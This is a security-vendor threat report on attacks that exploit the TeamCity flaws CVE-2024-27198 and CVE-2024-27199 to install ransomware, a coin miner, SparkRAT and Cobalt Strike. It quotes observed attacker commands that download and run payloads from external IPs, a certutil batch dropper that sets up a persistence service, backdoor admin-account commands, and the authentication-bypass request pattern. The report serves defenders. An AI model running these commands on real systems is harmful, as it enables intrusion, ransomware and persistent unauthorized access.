TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types

CVE-2024-27198 and CVE-2024-27199 are vulnerabilities within the TeamCity On-Premises platform that can allow attackers to gain administrative control over affected systems.

 

On March 4, 2024, JetBrains disclosed two critical vulnerabilities — CVE-2024-27198 and CVE-2024-27199 — within the TeamCity On-Premises platform that allow attackers to bypass authentication measures and gain administrative control over affected servers.

Threat actors can exploit CVE-2024-27198 to perform a variety of malicious operations (which will be discussed in separate subsections), including:

  • Dropping the Jasmin ransomware
  • Deploying the XMRig cryptocurrency miner
  • Deploying Cobalt Strike beacons
  • Deploying the SparkRAT backdoor
  • Executing domain discovery and persistence commands

Public proof-of-concept (POCs) exploits for these vulnerabilities already exist, heightening the risk of widespread exploitation. Given the active exploitation we’ve observed via our telemetry, it’s essential for organizations to promptly address these vulnerabilities to safeguard their data and systems. Customers of TeamCity with servers affected by these vulnerabilities are advised to update their software as soon as possible. The US Cybersecurity and Infrastructure Security Agency (CISA) has also added CVE-2024-27198 to its Known Exploited Vulnerabilities catalog. Trend Micro customers are protected from this vulnerability via the listed solutions at the end of this blog entry.

Description of vulnerabilities

Rapid7 published an analysis of the two vulnerabilities in the JetBrains TeamCity continuous integration and continuous deployment (CI/CD) server that is currently being exploited in the wild with numerous proof of concepts proliferating on GitHub and social media.

CVE-2024-27198: ­JetBrains TeamCity authentication bypass vulnerability­­
­
CVE-2024-27198 is an authentication bypass vulnerability (with a Critical CVSS score of 9.8) in the web component of TeamCity that contains an alternative path issue (CWE-288). This vulnerability can be exploited by an unauthenticated attacker to achieve remote code execution (RCE).


Figure 1. An example of network traffic exploiting CVE-2024-27198
 
Figure 1. An example of network traffic exploiting CVE-2024-27198

To exploit CVE-2024-27198, an attacker must meet the following conditions:

  • Generate an unauthenticated 404 HTTP Response.
  • Pass the HTTP query string “?jsp=/app/rest/server”.
  • Append “;.jsp” to the HTTP path parameter.

CVE-2024-27199: JetBrains TeamCity directory traversal vulnerability

CVE-2024-27199 is a directory traversal vulnerability (CWE-22) in the web component of TeamCity with a High CVSS score of 7.3 that can lead to authentication bypass. An attacker can leverage this vulnerability to leak sensitive information and modify a limited number of TeamCity system settings.


Figure 2. An example of network traffic exploiting CVE-2024-27199
 
Figure 2. An example of network traffic exploiting CVE-2024-27199

Several TeamCity paths are vulnerable to a directory traversal, including:

  • /res/
  • /update/
  • /.well-known/acme-challenge/

Post-Exploitation payloads

Within the same timeframe of the disclosure TeamCity vulnerabilities, several proofs of concept were also made publicly available. Upon their publication, we observed instances of threat actors exploiting this vulnerability.

   Figure 3. Attack diagram

 
Figure 3. Attack diagram

Threat actors might exploit CVE-2024-27198 or CVE-2024-27199 to bypass authentication on vulnerable On-Premise TeamCity servers and perform follow-on commands. They are then able to perform RCE and TeamCity-related processes, such as spawning a command and scripting interpreter (including PowerShell) to download additional malware or perform discovery commands. The attackers are then able to install malware that can reach out to its command-and-control (C&C) server and perform additional commands such as deploying Cobalt Strike beacons and remote access trojans (RATs). Ransomware can then be installed as a final payload to encrypt files and demand ransom payments from victims.

Exploits that drop Jasmin ransomware

One of the earliest threat actors that we found exploiting these vulnerabilities deployed a variant of the open-source Jasmin ransomware during the post-exploitation phase.

We observed the following process tree via our telemetry:

Parent Process:
C:TeamCityjrebinjava.exe
Subject Process:
C:WindowsSystem32cmd.exe /c “msiexec /q /i hxxp://207[.]246[.]102[.]242:56641/ABC[.]msi”

This process will download an MSI file (SHA256: 56942b36d5990f66a81955a94511298fd27cb6092e467110a7995a0654f17b1a) that will drop and execute a PE file (SHA256: 32a630decb8fcc8a7ed4811f4293b9d5a242ce7865ab10c19a16fc4aa384bf64).

The ransomware has the ability to rename files with the extension .lsoc and drop a ransom note with the file name un-lock your files.html.

Figure 4. Files renamed by the Jasmin ransomware use the extension .lsoc

 
Figure 4. Files renamed by the Jasmin ransomware use the extension .lsoc
Figure 5. Ransom note dropped by the Jasmin ransomware

 
Figure 5. Ransom note dropped by the Jasmin ransomware

Upon checking the ransom note’s source code, we discovered that it was obfuscated and used JavaScript to generate the ransom note text, likely to evade detection from security products and ensure that victims will see and read the ransom note file.


Figure 6. The Jasmin ransom note source code
 
Figure 6. The Jasmin ransom note source code

Deploying the XMRig cryptocurrency miner

We also found threat actors that were deploying a variant of the open-source XMRig cryptocurrency-mining malware to vulnerable TeamCity servers. Similar cryptominers were also be deployed in January 2024 after Ivanti Connect Secure VPN exploitation activities. The following is the cryptominer installation as seen from our telemetry:

Parent Process:

C:TeamCityjrebinjava.exe

Subject Process:

C:WindowsSystem32cmd.exe /c “msiexec /q /i hxxp://146[.]70[.]149[.]185:58090/JavaAccessBridge-64.msi”

The downloaded MSI file (SHA256: 7cbe0c55b3ca5d12be640e519e4399469399b3eaada20705342fa681befe8c7b) will drop, decrypt, and execute the main XMRIG file named JavaAccessBridge-64.exe (SHA256: 01db4578f5fb7b29800f7b07a31fda7ff812309f62f7148fca0e246279f6ca61) alongside its two component files named config.json and WinRing0x64.sys on the C:UsersPublicVideos directory.

Figure 7. The coinminer component files dropped in the “C:UsersPublicVideos” directory

 
Figure 7. The coinminer component files dropped in the “C:UsersPublicVideos” directory

The malware uses the vulnerable driver WinRing0x64.sys to access the model-specific register (MSR) to perform its mining routines when other methods fail.

Figure 8. The malware attempts to create a service for the WinRing0 driver

 
Figure 8. The malware attempts to create a service for the WinRing0 driver

The miner is configured to run using the following config file (saved in the config.json file):

Figure 9. A snippet of the config file

 
Figure 9. A snippet of the config file
Figure 10. Screenshot of the XMRig console

 
Figure 10. Screenshot of the XMRig console

This miner was installed using multiple stages of batch files and living-off-the-land binary (LOLBin) tools such as certutil.exe. Figure 11 shows the process tree and the executed commands as seen from Trend Micro Vision One™ telemetry. 

Figure 11. The miner process tree as seen from Trend Vision One

 
Figure 11. The miner process tree as seen from Trend Vision One

Deploying the SparkRAT backdoor

Meanwhile, another threat actor deployed a variant of the open-source Golang-based SparkRAT backdoor. We observed the executable binary java.exe under the TeamCity directory deploying a PowerShell command to download and execute a batch file named win.bat:

Parent Process:

C:TeamCityjrebinjava.exe

Subject Process:

C:WindowsSystem32cmd.exe /c “powershell -ep bypass IEX (New-Object System.Net.Webclient).DownloadFile(‘hxxp://38[.]54[.]94[.]13:8080/win.bat’,’c:userspublicwin.bat’);start-process ‘c:userspublicwin.bat'”

The contents of the downloaded win.bat file are as follows:

@echo off
cmd /c certutil -urlcache -split -f hxxp://38[.]54[.]94[.]13:8080/86.dat c:userspublicpublic.dat
cmd /c start /b c:userspublicpublic.dat
sc create windowDefenSrv binPath= “cmd /c start /b c:userspublicpublic.dat windowDefenSrv” start= auto
del c:userspublicwin.bat

This batch file will download and execute the SparkRAT malware (SHA256: 908b30abf730a5b51a3d25965eff45a639e881a97505220a38591fe326e00697) by abusing certutil, after which it will delete the original win.bat. The C&C server of this piece of malware is 38[.]54[.]94[.]13.

Figure 12 shows a snippet of the SparkRAT functions that were found inside the downloaded backdoor and are consistent with the code from the open-source repository https://github.com/XZB-1248/Spark.

Similar to the cryptocurrency miner installation, the threat actors deploying SparkRAT also used a variety of batch files and LOLBins to perform a multistage attack. Figure 13 shows the process tree and the executed commands as seen from the Trend Vision One XDR telemetry.

Figure 12. SparkRAT process tree and executed commands

 
Figure 12. SparkRAT process tree and executed commands

Executing domain discovery and persistence commands

Aside from malware deployment, we have also seen several attempts to discover network infrastructure and employ persistence commands arising from the java.exe process under a vulnerable TeamCity server directory.

Parent Process:
C:TeamCityjrebinjava.exe

We observed the following subject processes being used for discovery and persistence tactics:

  • C:WINDOWSsystem32net.exe  group /domain
  • C:WINDOWSsystem32net1.exe localgroup Administratoren /add Default$
  • C:WINDOWSsystem32net1.exe localgroup Administrators /add Default$
  • C:WINDOWSsystem32net1.exe user /add Default$ GH{redacted}23gwg
  • C:WINDOWSsystem32net1.exe user /del defaultuser0
  • C:WINDOWSsystem32net1.exe user /domain
  • C:WINDOWSsystem32net1.exe user administrator
  • C:WINDOWSsystem32net1.exe user default$
  • C:WINDOWSsystem32nltest.exe  /domain_trusts

Several of these commands involve attempts to manipulate user accounts, groups, and permissions, which are typical actions taken by attackers seeking to gain unauthorized access to a system. The attempt to add a user to the local Administrators group is particularly concerning, since it could grant elevated privileges to attackers and help them establish a foothold in the system that can be used to maintain access over an extended period.

Deploying Cobalt Strike beacons

Finally, we found threat actors deploying Cobeacon to vulnerable TeamCity servers. In one of the environments with a vulnerable TeamCity server, we found that a beacon (SHA1: db6bd96b152314db3c430df41b83fcf2e5712281) was deployed.

The beacon was downloaded using the command curl  hxxp://83[.]97[.]20[.]141:81/beacon.out -o .conf and was saved in the path C:TeamCitybin.conf.

This was detected by the Trend Pattern Backdoor.Linux.COBEACON.SMYXDKV. The beacon reaches out to the C&C server 83[.]97[.]20[.]141, which we have already proactively detected as of this writing.

Conclusion

The active exploitation of vulnerabilities within TeamCity On-Premises represents a critical threat to organizations relying on this platform for their CI/CD processes. Our telemetry has revealed that threat actors are exploiting these vulnerabilities to deploy ransomware, coinminers, and backdoor payloads on compromised TeamCity servers.

This malicious activity not only jeopardizes the confidentiality, integrity, and availability of sensitive data and critical systems but also imposes financial and operational risks for affected organizations. Swift action is imperative to mitigate these vulnerabilities and prevent further damage from ransomware extortion and other types of malware.

Trend Solutions

The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the TeamCity On-Premises vulnerabilities discussed in this entry.

Trend Cloud One™ – Network Security and TippingPoint™ Filters

  • 43957 – HTTP: JetBrains TeamCity Directory Traversal Vulnerability
  • 43958 – HTTP: JetBrains TeamCity Authentication Bypass Vulnerability

Trend Vision One Network Sensor and Trend Micro™ Deep Discovery™ Inspector (DDI) Rules

  • 5011 – CVE-2024-27198 – JetBrains TeamCity Auth Bypass Exploit – HTTP (Response)
  • 5012 – CVE-2024-27199 – JetBrains TeamCity Directory Traversal Exploit – HTTP (Response)

Trend Vision One Endpoint Security, Trend Cloud One – Workload and Endpoint Security, Trend Micro™ Deep Security™ Software, and Vulnerability Protection IPS Rules

  • 1011995 – JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2024-21798)
  • 1011996 – JetBrains TeamCity Directory Traversal Vulnerability (CVE-2024-21799)

Trend Vision One Queries

Description Trend Vision One Query
Jasmin ransomware file encryption event eventSubId:101 AND processFilePath:abc.exe AND objectFilePath:.lsoc
Service Installation of the Monero miner’s dropped Kernel driver as seen from the registry eventSubId:402 and tags:XSAE.F7460 and objectRegistryData:WinRing0x64.sys
Decoding of encrypted components dropped by the Monero miner MSI package through certutil.exe eventSubId:2 and processCmd:IndexStore.bat and objectCmd:(“certutil” and “decode”)
Execution of the SparkRAT malware from the batch file eventSubId:2 and processFilePath:cmd.exe and processCmd:win.bat and objectCmd:windowDefenSrv
Detection of suspicious process invocations from a TeamCity process eventSubId:2 AND processCmd:TeamCity AND objectCmd:(“powershell” OR “net” OR “nltest” OR “msiexec”)

MITRE ATT&CK Matrix

Tactic Technique ID
Initial Access Exploit Public-Facing Application  T1190
Execution PowerShell T1059.001
Defense Evasion De-obfuscate/Decode Files or Information T1140
Discovery Account Discovery T1087
Discovery Domain Trust Discovery T1482
Command and Control Ingress Tool Transfer T1105
Exfiltration Exfiltration Over C2 Channel T1041
Impact Data Encrypted for Impact T1486

Indicators of Compromise

The indicators of compromise for this entry can be found here.

Source: https://www.trendmicro.com/en_us/research/24/c/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html